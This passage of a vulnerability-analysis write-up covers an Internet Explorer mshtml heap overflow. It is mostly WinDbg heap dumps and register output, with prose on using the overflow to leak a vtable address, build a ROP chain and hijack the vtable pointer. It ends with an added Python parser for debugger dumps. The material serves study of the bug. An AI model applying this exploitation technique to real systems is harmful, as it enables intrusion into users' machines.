cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CTableLayout::CalculateMinMax+0x175:
694ba1b2 50              push    eax
```
In addition, to determine the vftable offset, let's simply look it up dynamically:
```
0:005> x mshtml!CButtonLayout::*
6956f069 mshtml!CButtonLayout::GetThemeClassId (<no parameter info>)
695ee9c5 mshtml!CButtonLayout::GetInsets (<no parameter info>)
69508690 mshtml!CButtonLayout::`vftable' = <no type information>
6959cf35 mshtml!CButtonLayout::GetAutoSize (<no parameter info>)
69785a7c mshtml!CButtonLayout::HitTestContent (<no parameter info>)
6955d2e3 mshtml!CButtonLayout::DrawClientBackground (<no parameter info>)
69509211 mshtml!CButtonLayout::Init (<no parameter info>)
6959cf35 mshtml!CButtonLayout::GetMultiLine (<no parameter info>)
696f1080 mshtml!CButtonLayout::s_layoutdesc = <no type information>
69785a6c mshtml!CButtonLayout::GetBtnHelper (<no parameter info>)
697858a7 mshtml!CButtonLayout::GetFocusShape (<no parameter info>)
696f1079 mshtml!CButtonLayout::GetLayoutDesc (<no parameter info>)
69785a07 mshtml!CButtonLayout::DoLayout (<no parameter info>)
6956f069 mshtml!CButtonLayout::GetWordWrap (<no parameter info>)
695084f8 mshtml!CButtonLayout::`vftable' = <no type information>
6955d2af mshtml!CButtonLayout::DrawClient (<no parameter info>)
695d36c1 mshtml!CButtonLayout::`scalar deleting destructor' (<no parameter info>)
697856e7 mshtml!CButtonLayout::DrawClientBorder (<no parameter info>)
695d36c1 mshtml!CButtonLayout::`vector deleting destructor' (<no parameter info>)
695eeb59 mshtml!CButtonLayout::GetDefaultSize (<no parameter info>)
```
Oddly, there are two vftables; I do not know why either...
Also take a look at vulheap:
```
1:026> db 03f2ae30 l101c
03f2ae30  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2ae40  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2ae50  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2ae60  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2ae70  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2ae80  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2ae90  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2aea0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2aeb0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2aec0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2aed0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2aee0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2aef0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2af00  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2af10  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2af20  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2af30  04 10 00 00 04 10 00 00-0c 61 81 04 00 00 00 00  .........a......
03f2af40  02 00 00 00 48 00 01 00-04 10 00 00 04 10 00 00  ....H...........
03f2af50  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2af60  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2af70  41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00  A.A.A.A.A.A.H...
03f2af80  04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00  ............A.A.
03f2af90  41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00  A.A.A.A.H.......
03f2afa0  04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00  ........A.A.A.A.
03f2afb0  41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00  A.A.H...........
03f2afc0  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2afd0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2afe0  41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00  A.A.A.A.A.A.H...
03f2aff0  04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00  ............A.A.
03f2b000  41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00  A.A.A.A.H.......
03f2b010  04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00  ........A.A.A.A.
03f2b020  41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00  A.A.H...........
03f2b030  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2b040  48 00 01 00 41 00 00 00-20 10 d1 01 00 00 00 c2  H...A... .......
03f2b050  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b060  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b070  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b080  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b090  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0c0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b100  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b110  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b120  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b130  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b140  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b150  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2b160  05 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  .........j......
03f2b170  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2b180  70 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  p....<.h........
03f2b190  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2b1a0  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2b1b0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1c0  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2b1d0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1e0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1f0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b200  00 00 00 00 00 00 00 00-00 00 00 00 28 b2 f2 03  ............(...
03f2b210  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b220  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b230  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b240  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2b250  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b260  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b270  00 00 00 00 00 00 00 00-66 10 d1 01 00 00 00 c2  ........f.......
03f2b280  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2b290  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b2a0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b2b0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b2c0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b2d0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b2e0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b2f0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b300  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b310  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b320  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b330  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b340  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b350  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b360  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b370  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b380  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2b390  5b 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  [........a......
03f2b3a0  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2b3b0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3c0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3d0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3e0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3f0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b400  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b410  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b420  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b430  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b440  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b450  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b460  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b470  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b480  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b490  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b4a0  41 00 41 00 41 00 00 00-bc 10 d1 01 00 00 00 c2  A.A.A...........
03f2b4b0  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b4c0  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b4d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b4e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b4f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b500  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b510  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b520  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b530  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b540  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b550  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b560  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b570  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b580  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b590  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b5a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b5b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2b5c0  91 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  .........j......
03f2b5d0  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2b5e0  e0 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  .....<.h........
03f2b5f0  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2b600  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2b610  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b620  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2b630  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b640  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b650  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b660  00 00 00 00 00 00 00 00-00 00 00 00 88 b6 f2 03  ................
03f2b670  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b680  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b690  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6a0  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2b6b0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6c0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6d0  00 00 00 00 00 00 00 00-f2 10 d1 01 00 00 00 c2  ................
03f2b6e0  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2b6f0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b700  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b710  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b720  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b730  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b740  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b750  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b760  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b770  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b780  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b790  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b7a0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b7b0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b7c0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b7d0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b7e0  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2b7f0  d7 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  .........a......
03f2b800  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2b810  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b820  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b830  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b840  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b850  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b860  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b870  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b880  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b890  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8a0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8b0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8c0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8d0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8e0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8f0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b900  41 00 41 00 41 00 00 00-08 11 d1 01 00 00 00 c2  A.A.A...........
03f2b910  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b920  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b930  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b940  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b950  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b960  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b970  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b980  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b990  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9c0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2ba00  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2ba10  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2ba20  6d 11 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  m........j......
03f2ba30  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2ba40  50 91 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  P....<.h........
03f2ba50  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2ba60  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2ba70  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2ba80  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2ba90  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2baa0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bab0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bac0  00 00 00 00 00 00 00 00-00 00 00 00 e8 ba f2 03  ................
03f2bad0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bae0  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2baf0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb00  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2bb10  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb20  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb30  00 00 00 00 00 00 00 00-4e 11 d1 01 00 00 00 c2  ........N.......
03f2bb40  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2bb50  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bb60  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2bb70  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2bb80  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2bb90  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2bba0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2bbb0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2bbc0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bbd0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2bbe0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2bbf0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2bc00  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2bc10  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2bc20  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2bc30  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bc40  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2bc50  a3 11 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  .........a......
03f2bc60  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2bc70  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bc80  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bc90  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bca0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcb0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcc0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcd0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bce0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcf0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd00  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd10  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd20  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd30  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd40  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
```
It is easy to see that the AAAA string at 03f2ae30 has been extensively overwritten, so that block is the vulnerable heap buffer (vulheap). Once the vtable address is obtained, the mshtml base address is computed from it and the ROP chain is built. Then the overflow is triggered again; this time it is sized exactly like the overflow that just overwrote the BBBB region, so it overwrites the vtable pointer directly, and the vtable pointer can be hijacked to an arbitrary address, as follows:
(6cc.7f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07070024 ---> controlled vtable pointer  ebx=01000000 ecx=040f8910 edx=00000041 esi=0375f530 edi=040e0790
eip=003d006b esp=0375f368 ebp=0375f3a0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
003d006b 777a            ja      003d00e7                                [br=1]
This concludes the analysis of the vulnerability.
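To make the by-eye check above ("the AAAA string was extensively overwritten") repeatable, here is an added Python helper that is not part of the original post: it parses WinDbg `db` output (including records that extraction flattened onto one line), finds runs of a UTF-16 fill character such as 'A' or 'B', and flags fill strings that are shorter than the spray wrote, which is exactly the symptom of a clobbered block. The dump in SAMPLE_DB is constructed for the example and does not reuse the page's addresses.

```python
import re

# One WinDbg `db` record: an 8-hex-digit address, then up to 16 byte pairs separated by
# ' ' or '-'. finditer is used so records flattened onto one physical line still parse.
DB_RECORD = re.compile(r"\b([0-9a-fA-F]{8}) ((?:[0-9a-fA-F]{2}[ -]){0,15}[0-9a-fA-F]{2})(?=\s|$)")

def parse_db(text):
    """Parse `db` output into contiguous (base address, bytes) segments, sorted by address."""
    recs = sorted((int(m.group(1), 16), bytes.fromhex(m.group(2).replace("-", " ")))
                  for m in DB_RECORD.finditer(text))
    segs = []
    for addr, raw in recs:
        if segs and segs[-1][0] + len(segs[-1][1]) == addr:   # abuts the previous record
            segs[-1][1].extend(raw)
        else:
            segs.append((addr, bytearray(raw)))
    return [(a, bytes(b)) for a, b in segs]

def marker_runs(text, marker, min_units=2):
    """Maximal runs of a repeated marker such as b'A\\x00' (UTF-16 'A').
    Returns (start address, number of marker units) for each run of >= min_units."""
    runs, w = [], len(marker)
    for base, buf in parse_db(text):
        i = 0
        while i < len(buf):
            if buf[i:i + w] != marker:
                i += 1
                continue
            j = i
            while buf[j:j + w] == marker:
                j += w
            if (j - i) // w >= min_units:
                runs.append((base + i, (j - i) // w))
            i = j
    return runs

def truncated_runs(text, marker, expected_units):
    """Marker strings shorter than the spray wrote: that block was partly overwritten."""
    return [(a, n) for a, n in marker_runs(text, marker) if n < expected_units]

# Constructed sample (not from the page): an 8-char 'A' string whose tail was clobbered
# by 'B', then an intact 8-char 'A' string. "10 00 00 00" stands in for a length header.
SAMPLE_DB = """\
03f2ae20 00 00 00 00 10 00 00 00-41 00 41 00 41 00 42 00 ........A.A.A.B.
03f2ae30 42 00 42 00 42 00 42 00-00 00 00 00 10 00 00 00 B.B.B.B.........
03f2ae40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2ae50 00 00 00 00                                     ....
"""
```

Calling `truncated_runs(SAMPLE_DB, b"A\x00", 8)` reports the 'A' string at 03f2ae28 with only 3 of 8 characters left, i.e. the spot where the overflow landed; only byte-format `db` output is handled, not `dd`.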
References
《漏洞战争》 (Vulnerability Wars)
WinDbg vulnerability analysis and debugging (1): https://paper.seebug.org/179/